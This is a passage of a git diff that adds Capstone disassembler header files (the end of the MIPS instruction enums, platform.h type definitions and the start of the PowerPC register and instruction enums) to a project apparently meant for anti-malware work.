MIPS_INS_LWR, + MIPS_INS_LWUPC, + MIPS_INS_LWU, + MIPS_INS_LWX, + MIPS_INS_LWXC1, + MIPS_INS_LWXS, + MIPS_INS_LI, + MIPS_INS_MADD, + MIPS_INS_MADDF, + 
MIPS_INS_MADDR_Q, + MIPS_INS_MADDU, + MIPS_INS_MADDV, + MIPS_INS_MADD_Q, + MIPS_INS_MAQ_SA, + MIPS_INS_MAQ_S, + MIPS_INS_MAXA, + MIPS_INS_MAXI_S, + MIPS_INS_MAXI_U, + MIPS_INS_MAX_A, + MIPS_INS_MAX, + MIPS_INS_MAX_S, + MIPS_INS_MAX_U, + MIPS_INS_MFC0, + MIPS_INS_MFC1, + MIPS_INS_MFC2, + MIPS_INS_MFHC1, + MIPS_INS_MFHI, + MIPS_INS_MFLO, + MIPS_INS_MINA, + MIPS_INS_MINI_S, + MIPS_INS_MINI_U, + MIPS_INS_MIN_A, + MIPS_INS_MIN, + MIPS_INS_MIN_S, + MIPS_INS_MIN_U, + MIPS_INS_MOD, + MIPS_INS_MODSUB, + MIPS_INS_MODU, + MIPS_INS_MOD_S, + MIPS_INS_MOD_U, + MIPS_INS_MOVE, + MIPS_INS_MOVEP, + MIPS_INS_MOVF, + MIPS_INS_MOVN, + MIPS_INS_MOVT, + MIPS_INS_MOVZ, + MIPS_INS_MSUB, + MIPS_INS_MSUBF, + MIPS_INS_MSUBR_Q, + MIPS_INS_MSUBU, + MIPS_INS_MSUBV, + MIPS_INS_MSUB_Q, + MIPS_INS_MTC0, + MIPS_INS_MTC1, + MIPS_INS_MTC2, + MIPS_INS_MTHC1, + MIPS_INS_MTHI, + MIPS_INS_MTHLIP, + MIPS_INS_MTLO, + MIPS_INS_MTM0, + MIPS_INS_MTM1, + MIPS_INS_MTM2, + MIPS_INS_MTP0, + MIPS_INS_MTP1, + MIPS_INS_MTP2, + MIPS_INS_MUH, + MIPS_INS_MUHU, + MIPS_INS_MULEQ_S, + MIPS_INS_MULEU_S, + MIPS_INS_MULQ_RS, + MIPS_INS_MULQ_S, + MIPS_INS_MULR_Q, + MIPS_INS_MULSAQ_S, + MIPS_INS_MULSA, + MIPS_INS_MULT, + MIPS_INS_MULTU, + MIPS_INS_MULU, + MIPS_INS_MULV, + MIPS_INS_MUL_Q, + MIPS_INS_MUL_S, + MIPS_INS_NLOC, + MIPS_INS_NLZC, + MIPS_INS_NMADD, + MIPS_INS_NMSUB, + MIPS_INS_NOR, + MIPS_INS_NORI, + MIPS_INS_NOT16, + MIPS_INS_NOT, + MIPS_INS_OR, + MIPS_INS_OR16, + MIPS_INS_ORI, + MIPS_INS_PACKRL, + MIPS_INS_PAUSE, + MIPS_INS_PCKEV, + MIPS_INS_PCKOD, + MIPS_INS_PCNT, + MIPS_INS_PICK, + MIPS_INS_POP, + MIPS_INS_PRECEQU, + MIPS_INS_PRECEQ, + MIPS_INS_PRECEU, + MIPS_INS_PRECRQU_S, + MIPS_INS_PRECRQ, + MIPS_INS_PRECRQ_RS, + MIPS_INS_PRECR, + MIPS_INS_PRECR_SRA, + MIPS_INS_PRECR_SRA_R, + MIPS_INS_PREF, + MIPS_INS_PREPEND, + MIPS_INS_RADDU, + MIPS_INS_RDDSP, + MIPS_INS_RDHWR, + MIPS_INS_REPLV, + MIPS_INS_REPL, + MIPS_INS_RINT, + MIPS_INS_ROTR, + MIPS_INS_ROTRV, + MIPS_INS_ROUND, + MIPS_INS_SAT_S, + MIPS_INS_SAT_U, + 
MIPS_INS_SB, + MIPS_INS_SB16, + MIPS_INS_SC, + MIPS_INS_SCD, + MIPS_INS_SD, + MIPS_INS_SDBBP, + MIPS_INS_SDBBP16, + MIPS_INS_SDC1, + MIPS_INS_SDC2, + MIPS_INS_SDC3, + MIPS_INS_SDL, + MIPS_INS_SDR, + MIPS_INS_SDXC1, + MIPS_INS_SEB, + MIPS_INS_SEH, + MIPS_INS_SELEQZ, + MIPS_INS_SELNEZ, + MIPS_INS_SEL, + MIPS_INS_SEQ, + MIPS_INS_SEQI, + MIPS_INS_SH, + MIPS_INS_SH16, + MIPS_INS_SHF, + MIPS_INS_SHILO, + MIPS_INS_SHILOV, + MIPS_INS_SHLLV, + MIPS_INS_SHLLV_S, + MIPS_INS_SHLL, + MIPS_INS_SHLL_S, + MIPS_INS_SHRAV, + MIPS_INS_SHRAV_R, + MIPS_INS_SHRA, + MIPS_INS_SHRA_R, + MIPS_INS_SHRLV, + MIPS_INS_SHRL, + MIPS_INS_SLDI, + MIPS_INS_SLD, + MIPS_INS_SLL, + MIPS_INS_SLL16, + MIPS_INS_SLLI, + MIPS_INS_SLLV, + MIPS_INS_SLT, + MIPS_INS_SLTI, + MIPS_INS_SLTIU, + MIPS_INS_SLTU, + MIPS_INS_SNE, + MIPS_INS_SNEI, + MIPS_INS_SPLATI, + MIPS_INS_SPLAT, + MIPS_INS_SRA, + MIPS_INS_SRAI, + MIPS_INS_SRARI, + MIPS_INS_SRAR, + MIPS_INS_SRAV, + MIPS_INS_SRL, + MIPS_INS_SRL16, + MIPS_INS_SRLI, + MIPS_INS_SRLRI, + MIPS_INS_SRLR, + MIPS_INS_SRLV, + MIPS_INS_SSNOP, + MIPS_INS_ST, + MIPS_INS_SUBQH, + MIPS_INS_SUBQH_R, + MIPS_INS_SUBQ, + MIPS_INS_SUBQ_S, + MIPS_INS_SUBSUS_U, + MIPS_INS_SUBSUU_S, + MIPS_INS_SUBS_S, + MIPS_INS_SUBS_U, + MIPS_INS_SUBU16, + MIPS_INS_SUBUH, + MIPS_INS_SUBUH_R, + MIPS_INS_SUBU, + MIPS_INS_SUBU_S, + MIPS_INS_SUBVI, + MIPS_INS_SUBV, + MIPS_INS_SUXC1, + MIPS_INS_SW, + MIPS_INS_SW16, + MIPS_INS_SWC1, + MIPS_INS_SWC2, + MIPS_INS_SWC3, + MIPS_INS_SWL, + MIPS_INS_SWM16, + MIPS_INS_SWM32, + MIPS_INS_SWP, + MIPS_INS_SWR, + MIPS_INS_SWXC1, + MIPS_INS_SYNC, + MIPS_INS_SYNCI, + MIPS_INS_SYSCALL, + MIPS_INS_TEQ, + MIPS_INS_TEQI, + MIPS_INS_TGE, + MIPS_INS_TGEI, + MIPS_INS_TGEIU, + MIPS_INS_TGEU, + MIPS_INS_TLBP, + MIPS_INS_TLBR, + MIPS_INS_TLBWI, + MIPS_INS_TLBWR, + MIPS_INS_TLT, + MIPS_INS_TLTI, + MIPS_INS_TLTIU, + MIPS_INS_TLTU, + MIPS_INS_TNE, + MIPS_INS_TNEI, + MIPS_INS_TRUNC, + MIPS_INS_V3MULU, + MIPS_INS_VMM0, + MIPS_INS_VMULU, + MIPS_INS_VSHF, + MIPS_INS_WAIT, + MIPS_INS_WRDSP, + 
MIPS_INS_WSBH, + MIPS_INS_XOR, + MIPS_INS_XOR16, + MIPS_INS_XORI, + + //> some alias instructions + MIPS_INS_NOP, + MIPS_INS_NEGU, + + //> special instructions + MIPS_INS_JALR_HB, // jump and link with Hazard Barrier + MIPS_INS_JR_HB, // jump register with Hazard Barrier + + MIPS_INS_ENDING, +} mips_insn; + +/// Group of MIPS instructions +typedef enum mips_insn_group { + MIPS_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + MIPS_GRP_JUMP, ///< = CS_GRP_JUMP + // all call instructions + MIPS_GRP_CALL, ///< = CS_GRP_CALL + // all return instructions + MIPS_GRP_RET, ///< = CS_GRP_RET + // all interrupt instructions (int+syscall) + MIPS_GRP_INT, ///< = CS_GRP_INT + // all interrupt return instructions + MIPS_GRP_IRET, ///< = CS_GRP_IRET + // all privileged instructions + MIPS_GRP_PRIVILEGE, ///< = CS_GRP_PRIVILEGE + // all relative branching instructions + MIPS_GRP_BRANCH_RELATIVE, ///< = CS_GRP_BRANCH_RELATIVE + + // Architecture-specific groups + MIPS_GRP_BITCOUNT = 128, + MIPS_GRP_DSP, + MIPS_GRP_DSPR2, + MIPS_GRP_FPIDX, + MIPS_GRP_MSA, + MIPS_GRP_MIPS32R2, + MIPS_GRP_MIPS64, + MIPS_GRP_MIPS64R2, + MIPS_GRP_SEINREG, + MIPS_GRP_STDENC, + MIPS_GRP_SWAP, + MIPS_GRP_MICROMIPS, + MIPS_GRP_MIPS16MODE, + MIPS_GRP_FP64BIT, + MIPS_GRP_NONANSFPMATH, + MIPS_GRP_NOTFP64BIT, + MIPS_GRP_NOTINMICROMIPS, + MIPS_GRP_NOTNACL, + MIPS_GRP_NOTMIPS32R6, + MIPS_GRP_NOTMIPS64R6, + MIPS_GRP_CNMIPS, + MIPS_GRP_MIPS32, + MIPS_GRP_MIPS32R6, + MIPS_GRP_MIPS64R6, + MIPS_GRP_MIPS2, + MIPS_GRP_MIPS3, + MIPS_GRP_MIPS3_32, + MIPS_GRP_MIPS3_32R2, + MIPS_GRP_MIPS4_32, + MIPS_GRP_MIPS4_32R2, + MIPS_GRP_MIPS5_32R2, + MIPS_GRP_GP32BIT, + MIPS_GRP_GP64BIT, + + MIPS_GRP_ENDING, +} mips_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/platform.h b/ai_anti_malware/capstone/include/capstone/platform.h new file mode 100644 index 0000000..a5a4bd2 --- /dev/null +++ 
b/ai_anti_malware/capstone/include/capstone/platform.h @@ -0,0 +1,122 @@ +/* Capstone Disassembly Engine */ +/* By Axel Souchet & Nguyen Anh Quynh, 2014 */ + +#ifndef CAPSTONE_PLATFORM_H +#define CAPSTONE_PLATFORM_H + + +// handle C99 issue (for pre-2013 VisualStudio) +#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) +// MSVC + +// stdbool.h +#if (_MSC_VER < 1800) || defined(_KERNEL_MODE) +// this system does not have stdbool.h +#ifndef __cplusplus +typedef unsigned char bool; +#define false 0 +#define true 1 +#endif // __cplusplus + +#else +// VisualStudio 2013+ -> C99 is supported +#include +#endif // (_MSC_VER < 1800) || defined(_KERNEL_MODE) + +#else +// not MSVC -> C99 is supported +#include +#endif // !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) + + +// handle inttypes.h / stdint.h compatibility +#if defined(_WIN32_WCE) && (_WIN32_WCE < 0x800) +#include "windowsce/stdint.h" +#endif // defined(_WIN32_WCE) && (_WIN32_WCE < 0x800) + +#if defined(CAPSTONE_HAS_OSXKERNEL) || (defined(_MSC_VER) && (_MSC_VER <= 1700 || defined(_KERNEL_MODE))) +// this system does not have inttypes.h + +#if defined(_MSC_VER) && (_MSC_VER <= 1600 || defined(_KERNEL_MODE)) +// this system does not have stdint.h +typedef signed char int8_t; +typedef signed short int16_t; +typedef signed int int32_t; +typedef unsigned char uint8_t; +typedef unsigned short uint16_t; +typedef unsigned int uint32_t; +typedef signed long long int64_t; +typedef unsigned long long uint64_t; +#endif // defined(_MSC_VER) && (_MSC_VER <= 1600 || defined(_KERNEL_MODE)) + +#if defined(_MSC_VER) && (_MSC_VER < 1600 || defined(_KERNEL_MODE)) +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define 
INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 +#endif // defined(_MSC_VER) && (_MSC_VER < 1600 || defined(_KERNEL_MODE)) + +#ifdef CAPSTONE_HAS_OSXKERNEL +// this system has stdint.h +#include +#endif + +#define __PRI_8_LENGTH_MODIFIER__ "hh" +#define __PRI_64_LENGTH_MODIFIER__ "ll" + +#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" +#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" +#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" +#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" +#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" +#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" + +#define PRId16 "hd" +#define PRIi16 "hi" +#define PRIo16 "ho" +#define PRIu16 "hu" +#define PRIx16 "hx" +#define PRIX16 "hX" + +#if defined(_MSC_VER) && _MSC_VER <= 1700 +#define PRId32 "ld" +#define PRIi32 "li" +#define PRIo32 "lo" +#define PRIu32 "lu" +#define PRIx32 "lx" +#define PRIX32 "lX" +#else // OSX +#define PRId32 "d" +#define PRIi32 "i" +#define PRIo32 "o" +#define PRIu32 "u" +#define PRIx32 "x" +#define PRIX32 "X" +#endif // defined(_MSC_VER) && _MSC_VER <= 1700 + +#if defined(_MSC_VER) && _MSC_VER <= 1700 +// redefine functions from inttypes.h used in cstool +#define strtoull _strtoui64 +#endif + +#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" +#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" +#define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o" +#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" +#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" +#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" + +#else +// this system has inttypes.h by default +#include +#endif // defined(CAPSTONE_HAS_OSXKERNEL) || (defined(_MSC_VER) && (_MSC_VER <= 1700 || defined(_KERNEL_MODE))) + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/ppc.h b/ai_anti_malware/capstone/include/capstone/ppc.h new file mode 100644 index 
0000000..97ce15b --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/ppc.h @@ -0,0 +1,1463 @@ +#ifndef CAPSTONE_PPC_H +#define CAPSTONE_PPC_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// PPC branch codes for some branch instructions +typedef enum ppc_bc { + PPC_BC_INVALID = 0, + PPC_BC_LT = (0 << 5) | 12, + PPC_BC_LE = (1 << 5) | 4, + PPC_BC_EQ = (2 << 5) | 12, + PPC_BC_GE = (0 << 5) | 4, + PPC_BC_GT = (1 << 5) | 12, + PPC_BC_NE = (2 << 5) | 4, + PPC_BC_UN = (3 << 5) | 12, + PPC_BC_NU = (3 << 5) | 4, + + // extra conditions + PPC_BC_SO = (4 << 5) | 12, ///< summary overflow + PPC_BC_NS = (4 << 5) | 4, ///< not summary overflow +} ppc_bc; + +/// PPC branch hint for some branch instructions +typedef enum ppc_bh { + PPC_BH_INVALID = 0, ///< no hint + PPC_BH_PLUS, ///< PLUS hint + PPC_BH_MINUS, ///< MINUS hint +} ppc_bh; + +/// Operand type for instruction's operands +typedef enum ppc_op_type { + PPC_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + PPC_OP_REG, ///< = CS_OP_REG (Register operand). + PPC_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + PPC_OP_MEM, ///< = CS_OP_MEM (Memory operand). 
+ PPC_OP_CRX = 64, ///< Condition Register field +} ppc_op_type; + +/// PPC registers +typedef enum ppc_reg { + PPC_REG_INVALID = 0, + + PPC_REG_CARRY, + PPC_REG_CR0, + PPC_REG_CR1, + PPC_REG_CR2, + PPC_REG_CR3, + PPC_REG_CR4, + PPC_REG_CR5, + PPC_REG_CR6, + PPC_REG_CR7, + PPC_REG_CTR, + PPC_REG_F0, + PPC_REG_F1, + PPC_REG_F2, + PPC_REG_F3, + PPC_REG_F4, + PPC_REG_F5, + PPC_REG_F6, + PPC_REG_F7, + PPC_REG_F8, + PPC_REG_F9, + PPC_REG_F10, + PPC_REG_F11, + PPC_REG_F12, + PPC_REG_F13, + PPC_REG_F14, + PPC_REG_F15, + PPC_REG_F16, + PPC_REG_F17, + PPC_REG_F18, + PPC_REG_F19, + PPC_REG_F20, + PPC_REG_F21, + PPC_REG_F22, + PPC_REG_F23, + PPC_REG_F24, + PPC_REG_F25, + PPC_REG_F26, + PPC_REG_F27, + PPC_REG_F28, + PPC_REG_F29, + PPC_REG_F30, + PPC_REG_F31, + PPC_REG_LR, + PPC_REG_R0, + PPC_REG_R1, + PPC_REG_R2, + PPC_REG_R3, + PPC_REG_R4, + PPC_REG_R5, + PPC_REG_R6, + PPC_REG_R7, + PPC_REG_R8, + PPC_REG_R9, + PPC_REG_R10, + PPC_REG_R11, + PPC_REG_R12, + PPC_REG_R13, + PPC_REG_R14, + PPC_REG_R15, + PPC_REG_R16, + PPC_REG_R17, + PPC_REG_R18, + PPC_REG_R19, + PPC_REG_R20, + PPC_REG_R21, + PPC_REG_R22, + PPC_REG_R23, + PPC_REG_R24, + PPC_REG_R25, + PPC_REG_R26, + PPC_REG_R27, + PPC_REG_R28, + PPC_REG_R29, + PPC_REG_R30, + PPC_REG_R31, + PPC_REG_V0, + PPC_REG_V1, + PPC_REG_V2, + PPC_REG_V3, + PPC_REG_V4, + PPC_REG_V5, + PPC_REG_V6, + PPC_REG_V7, + PPC_REG_V8, + PPC_REG_V9, + PPC_REG_V10, + PPC_REG_V11, + PPC_REG_V12, + PPC_REG_V13, + PPC_REG_V14, + PPC_REG_V15, + PPC_REG_V16, + PPC_REG_V17, + PPC_REG_V18, + PPC_REG_V19, + PPC_REG_V20, + PPC_REG_V21, + PPC_REG_V22, + PPC_REG_V23, + PPC_REG_V24, + PPC_REG_V25, + PPC_REG_V26, + PPC_REG_V27, + PPC_REG_V28, + PPC_REG_V29, + PPC_REG_V30, + PPC_REG_V31, + PPC_REG_VRSAVE, + PPC_REG_VS0, + PPC_REG_VS1, + PPC_REG_VS2, + PPC_REG_VS3, + PPC_REG_VS4, + PPC_REG_VS5, + PPC_REG_VS6, + PPC_REG_VS7, + PPC_REG_VS8, + PPC_REG_VS9, + PPC_REG_VS10, + PPC_REG_VS11, + PPC_REG_VS12, + PPC_REG_VS13, + PPC_REG_VS14, + PPC_REG_VS15, + PPC_REG_VS16, + 
PPC_REG_VS17, + PPC_REG_VS18, + PPC_REG_VS19, + PPC_REG_VS20, + PPC_REG_VS21, + PPC_REG_VS22, + PPC_REG_VS23, + PPC_REG_VS24, + PPC_REG_VS25, + PPC_REG_VS26, + PPC_REG_VS27, + PPC_REG_VS28, + PPC_REG_VS29, + PPC_REG_VS30, + PPC_REG_VS31, + PPC_REG_VS32, + PPC_REG_VS33, + PPC_REG_VS34, + PPC_REG_VS35, + PPC_REG_VS36, + PPC_REG_VS37, + PPC_REG_VS38, + PPC_REG_VS39, + PPC_REG_VS40, + PPC_REG_VS41, + PPC_REG_VS42, + PPC_REG_VS43, + PPC_REG_VS44, + PPC_REG_VS45, + PPC_REG_VS46, + PPC_REG_VS47, + PPC_REG_VS48, + PPC_REG_VS49, + PPC_REG_VS50, + PPC_REG_VS51, + PPC_REG_VS52, + PPC_REG_VS53, + PPC_REG_VS54, + PPC_REG_VS55, + PPC_REG_VS56, + PPC_REG_VS57, + PPC_REG_VS58, + PPC_REG_VS59, + PPC_REG_VS60, + PPC_REG_VS61, + PPC_REG_VS62, + PPC_REG_VS63, + PPC_REG_Q0, + PPC_REG_Q1, + PPC_REG_Q2, + PPC_REG_Q3, + PPC_REG_Q4, + PPC_REG_Q5, + PPC_REG_Q6, + PPC_REG_Q7, + PPC_REG_Q8, + PPC_REG_Q9, + PPC_REG_Q10, + PPC_REG_Q11, + PPC_REG_Q12, + PPC_REG_Q13, + PPC_REG_Q14, + PPC_REG_Q15, + PPC_REG_Q16, + PPC_REG_Q17, + PPC_REG_Q18, + PPC_REG_Q19, + PPC_REG_Q20, + PPC_REG_Q21, + PPC_REG_Q22, + PPC_REG_Q23, + PPC_REG_Q24, + PPC_REG_Q25, + PPC_REG_Q26, + PPC_REG_Q27, + PPC_REG_Q28, + PPC_REG_Q29, + PPC_REG_Q30, + PPC_REG_Q31, + + // extra registers for PPCMapping.c + PPC_REG_RM, + PPC_REG_CTR8, + PPC_REG_LR8, + PPC_REG_CR1EQ, + PPC_REG_X2, + + PPC_REG_ENDING, // <-- mark the end of the list of registers +} ppc_reg; + +/// Instruction's operand referring to memory +/// This is associated with PPC_OP_MEM operand type above +typedef struct ppc_op_mem { + ppc_reg base; ///< base register + int32_t disp; ///< displacement/offset value +} ppc_op_mem; + +typedef struct ppc_op_crx { + unsigned int scale; + ppc_reg reg; + ppc_bc cond; +} ppc_op_crx; + +/// Instruction operand +typedef struct cs_ppc_op { + ppc_op_type type; ///< operand type + union { + ppc_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + ppc_op_mem mem; ///< base/disp value for MEM 
operand + ppc_op_crx crx; ///< operand with condition register + }; +} cs_ppc_op; + +/// Instruction structure +typedef struct cs_ppc { + /// branch code for branch instructions + ppc_bc bc; + + /// branch hint for branch instructions + ppc_bh bh; + + /// if update_cr0 = True, then this 'dot' insn updates CR0 + bool update_cr0; + + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + cs_ppc_op operands[8]; ///< operands for this instruction. +} cs_ppc; + +/// PPC instruction +typedef enum ppc_insn { + PPC_INS_INVALID = 0, + + PPC_INS_ADD, + PPC_INS_ADDC, + PPC_INS_ADDE, + PPC_INS_ADDI, + PPC_INS_ADDIC, + PPC_INS_ADDIS, + PPC_INS_ADDME, + PPC_INS_ADDZE, + PPC_INS_AND, + PPC_INS_ANDC, + PPC_INS_ANDIS, + PPC_INS_ANDI, + PPC_INS_ATTN, + PPC_INS_B, + PPC_INS_BA, + PPC_INS_BC, + PPC_INS_BCCTR, + PPC_INS_BCCTRL, + PPC_INS_BCL, + PPC_INS_BCLR, + PPC_INS_BCLRL, + PPC_INS_BCTR, + PPC_INS_BCTRL, + PPC_INS_BCT, + PPC_INS_BDNZ, + PPC_INS_BDNZA, + PPC_INS_BDNZL, + PPC_INS_BDNZLA, + PPC_INS_BDNZLR, + PPC_INS_BDNZLRL, + PPC_INS_BDZ, + PPC_INS_BDZA, + PPC_INS_BDZL, + PPC_INS_BDZLA, + PPC_INS_BDZLR, + PPC_INS_BDZLRL, + PPC_INS_BL, + PPC_INS_BLA, + PPC_INS_BLR, + PPC_INS_BLRL, + PPC_INS_BRINC, + PPC_INS_CMPB, + PPC_INS_CMPD, + PPC_INS_CMPDI, + PPC_INS_CMPLD, + PPC_INS_CMPLDI, + PPC_INS_CMPLW, + PPC_INS_CMPLWI, + PPC_INS_CMPW, + PPC_INS_CMPWI, + PPC_INS_CNTLZD, + PPC_INS_CNTLZW, + PPC_INS_CREQV, + PPC_INS_CRXOR, + PPC_INS_CRAND, + PPC_INS_CRANDC, + PPC_INS_CRNAND, + PPC_INS_CRNOR, + PPC_INS_CROR, + PPC_INS_CRORC, + PPC_INS_DCBA, + PPC_INS_DCBF, + PPC_INS_DCBI, + PPC_INS_DCBST, + PPC_INS_DCBT, + PPC_INS_DCBTST, + PPC_INS_DCBZ, + PPC_INS_DCBZL, + PPC_INS_DCCCI, + PPC_INS_DIVD, + PPC_INS_DIVDU, + PPC_INS_DIVW, + PPC_INS_DIVWU, + PPC_INS_DSS, + PPC_INS_DSSALL, + PPC_INS_DST, + PPC_INS_DSTST, + PPC_INS_DSTSTT, + PPC_INS_DSTT, + PPC_INS_EQV, + PPC_INS_EVABS, + PPC_INS_EVADDIW, + PPC_INS_EVADDSMIAAW, + PPC_INS_EVADDSSIAAW, + 
PPC_INS_EVADDUMIAAW, + PPC_INS_EVADDUSIAAW, + PPC_INS_EVADDW, + PPC_INS_EVAND, + PPC_INS_EVANDC, + PPC_INS_EVCMPEQ, + PPC_INS_EVCMPGTS, + PPC_INS_EVCMPGTU, + PPC_INS_EVCMPLTS, + PPC_INS_EVCMPLTU, + PPC_INS_EVCNTLSW, + PPC_INS_EVCNTLZW, + PPC_INS_EVDIVWS, + PPC_INS_EVDIVWU, + PPC_INS_EVEQV, + PPC_INS_EVEXTSB, + PPC_INS_EVEXTSH, + PPC_INS_EVLDD, + PPC_INS_EVLDDX, + PPC_INS_EVLDH, + PPC_INS_EVLDHX, + PPC_INS_EVLDW, + PPC_INS_EVLDWX, + PPC_INS_EVLHHESPLAT, + PPC_INS_EVLHHESPLATX, + PPC_INS_EVLHHOSSPLAT, + PPC_INS_EVLHHOSSPLATX, + PPC_INS_EVLHHOUSPLAT, + PPC_INS_EVLHHOUSPLATX, + PPC_INS_EVLWHE, + PPC_INS_EVLWHEX, + PPC_INS_EVLWHOS, + PPC_INS_EVLWHOSX, + PPC_INS_EVLWHOU, + PPC_INS_EVLWHOUX, + PPC_INS_EVLWHSPLAT, + PPC_INS_EVLWHSPLATX, + PPC_INS_EVLWWSPLAT, + PPC_INS_EVLWWSPLATX, + PPC_INS_EVMERGEHI, + PPC_INS_EVMERGEHILO, + PPC_INS_EVMERGELO, + PPC_INS_EVMERGELOHI, + PPC_INS_EVMHEGSMFAA, + PPC_INS_EVMHEGSMFAN, + PPC_INS_EVMHEGSMIAA, + PPC_INS_EVMHEGSMIAN, + PPC_INS_EVMHEGUMIAA, + PPC_INS_EVMHEGUMIAN, + PPC_INS_EVMHESMF, + PPC_INS_EVMHESMFA, + PPC_INS_EVMHESMFAAW, + PPC_INS_EVMHESMFANW, + PPC_INS_EVMHESMI, + PPC_INS_EVMHESMIA, + PPC_INS_EVMHESMIAAW, + PPC_INS_EVMHESMIANW, + PPC_INS_EVMHESSF, + PPC_INS_EVMHESSFA, + PPC_INS_EVMHESSFAAW, + PPC_INS_EVMHESSFANW, + PPC_INS_EVMHESSIAAW, + PPC_INS_EVMHESSIANW, + PPC_INS_EVMHEUMI, + PPC_INS_EVMHEUMIA, + PPC_INS_EVMHEUMIAAW, + PPC_INS_EVMHEUMIANW, + PPC_INS_EVMHEUSIAAW, + PPC_INS_EVMHEUSIANW, + PPC_INS_EVMHOGSMFAA, + PPC_INS_EVMHOGSMFAN, + PPC_INS_EVMHOGSMIAA, + PPC_INS_EVMHOGSMIAN, + PPC_INS_EVMHOGUMIAA, + PPC_INS_EVMHOGUMIAN, + PPC_INS_EVMHOSMF, + PPC_INS_EVMHOSMFA, + PPC_INS_EVMHOSMFAAW, + PPC_INS_EVMHOSMFANW, + PPC_INS_EVMHOSMI, + PPC_INS_EVMHOSMIA, + PPC_INS_EVMHOSMIAAW, + PPC_INS_EVMHOSMIANW, + PPC_INS_EVMHOSSF, + PPC_INS_EVMHOSSFA, + PPC_INS_EVMHOSSFAAW, + PPC_INS_EVMHOSSFANW, + PPC_INS_EVMHOSSIAAW, + PPC_INS_EVMHOSSIANW, + PPC_INS_EVMHOUMI, + PPC_INS_EVMHOUMIA, + PPC_INS_EVMHOUMIAAW, + PPC_INS_EVMHOUMIANW, + 
PPC_INS_EVMHOUSIAAW, + PPC_INS_EVMHOUSIANW, + PPC_INS_EVMRA, + PPC_INS_EVMWHSMF, + PPC_INS_EVMWHSMFA, + PPC_INS_EVMWHSMI, + PPC_INS_EVMWHSMIA, + PPC_INS_EVMWHSSF, + PPC_INS_EVMWHSSFA, + PPC_INS_EVMWHUMI, + PPC_INS_EVMWHUMIA, + PPC_INS_EVMWLSMIAAW, + PPC_INS_EVMWLSMIANW, + PPC_INS_EVMWLSSIAAW, + PPC_INS_EVMWLSSIANW, + PPC_INS_EVMWLUMI, + PPC_INS_EVMWLUMIA, + PPC_INS_EVMWLUMIAAW, + PPC_INS_EVMWLUMIANW, + PPC_INS_EVMWLUSIAAW, + PPC_INS_EVMWLUSIANW, + PPC_INS_EVMWSMF, + PPC_INS_EVMWSMFA, + PPC_INS_EVMWSMFAA, + PPC_INS_EVMWSMFAN, + PPC_INS_EVMWSMI, + PPC_INS_EVMWSMIA, + PPC_INS_EVMWSMIAA, + PPC_INS_EVMWSMIAN, + PPC_INS_EVMWSSF, + PPC_INS_EVMWSSFA, + PPC_INS_EVMWSSFAA, + PPC_INS_EVMWSSFAN, + PPC_INS_EVMWUMI, + PPC_INS_EVMWUMIA, + PPC_INS_EVMWUMIAA, + PPC_INS_EVMWUMIAN, + PPC_INS_EVNAND, + PPC_INS_EVNEG, + PPC_INS_EVNOR, + PPC_INS_EVOR, + PPC_INS_EVORC, + PPC_INS_EVRLW, + PPC_INS_EVRLWI, + PPC_INS_EVRNDW, + PPC_INS_EVSLW, + PPC_INS_EVSLWI, + PPC_INS_EVSPLATFI, + PPC_INS_EVSPLATI, + PPC_INS_EVSRWIS, + PPC_INS_EVSRWIU, + PPC_INS_EVSRWS, + PPC_INS_EVSRWU, + PPC_INS_EVSTDD, + PPC_INS_EVSTDDX, + PPC_INS_EVSTDH, + PPC_INS_EVSTDHX, + PPC_INS_EVSTDW, + PPC_INS_EVSTDWX, + PPC_INS_EVSTWHE, + PPC_INS_EVSTWHEX, + PPC_INS_EVSTWHO, + PPC_INS_EVSTWHOX, + PPC_INS_EVSTWWE, + PPC_INS_EVSTWWEX, + PPC_INS_EVSTWWO, + PPC_INS_EVSTWWOX, + PPC_INS_EVSUBFSMIAAW, + PPC_INS_EVSUBFSSIAAW, + PPC_INS_EVSUBFUMIAAW, + PPC_INS_EVSUBFUSIAAW, + PPC_INS_EVSUBFW, + PPC_INS_EVSUBIFW, + PPC_INS_EVXOR, + PPC_INS_EXTSB, + PPC_INS_EXTSH, + PPC_INS_EXTSW, + PPC_INS_EIEIO, + PPC_INS_FABS, + PPC_INS_FADD, + PPC_INS_FADDS, + PPC_INS_FCFID, + PPC_INS_FCFIDS, + PPC_INS_FCFIDU, + 